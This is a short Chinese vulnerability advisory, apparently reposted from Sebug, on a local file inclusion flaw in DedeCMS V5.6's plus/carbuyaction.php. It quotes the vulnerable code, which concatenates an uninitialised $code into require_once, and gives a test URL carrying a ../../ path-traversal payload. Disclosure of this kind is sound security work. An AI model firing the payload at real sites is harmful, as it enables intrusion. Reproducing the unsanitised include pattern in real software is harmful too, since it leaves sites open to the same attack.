织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
2014-03-21 15:27
2236 查看
漏洞版本:
DedeCmsV5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。 1 <?php 02 require_once (dirname(__FILE__) . "/../include/common.inc.php"); 03 define('_PLUS_TPL_', DEDEROOT.'/templets/plus'); 04 require_once DEDEINC.'/dedetemplate.class.php'; 05 require_once DEDEINC.'/shopcar.class.php'; 06 require_once DEDEINC.'/memberlogin.class.php'; 07 08 if($cfg_mb_open=='N') 09 { 10 ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;"); 11 exit(); 12 } 13 14 $cfg_ml = new MemberLogin(); 15 16 if(!isset($dopost) || empty($dopost)){ //只要$dopost不为空就行,By:俺是农村的。 17 ... 18 }elseif($dopost == 'return'){ 19 require_once DEDEINC.'/payment/'.$code.'.php'; //变量$code未初始化,By:俺是农村的。 20 $pay = new $code; 21 $msg=$pay->respond(); 22 ShowMsg($msg,"javascript:;",0,3000); 23 exit(); 24 } 25 ?>
<* 参考
*>
测试方法:
@Sebug.net dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! http://www.ssvdb.com/plus/carbuyaction.php?dopost=return&code=../../
相关文章推荐
- DedeCMS漏洞文件之carbuyaction.php
- php 伪造本地文件包含漏洞的代码
- 织梦(Dedecms)V5.6 远程文件删除漏洞
- DedeCms 5.x 本地文件包含漏洞(respond方法)
- PHP本地文件包含(LFI)漏洞利用
- php本地及远程文件包含漏洞
- 网站安全检测、漏洞检测、dedecms本地文件包含
- PHPCMS V9 (plugin.php)本地文件包含漏洞hellxman
- PHP本地文件包含漏洞环境搭建与利用
- php 伪造本地文件包含漏洞的代码
- PHP本地文件包含(LFI)漏洞利用
- PHP本地文件包含漏洞的新突破
- DedeCms 5.x 本地文件包含漏洞(respond方法)
- 邪恶的空格-PHP本地文件包含漏洞的新突破口!
- PHP本地文件包含(LFI)漏洞利用
- PHP文件包含漏洞总结
- PHP文件包含漏洞原理分析和利用方法
- DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析
- PHP文件包含漏洞攻防实战(allow_url_fopen、open_basedir)
- PHP文件包含漏洞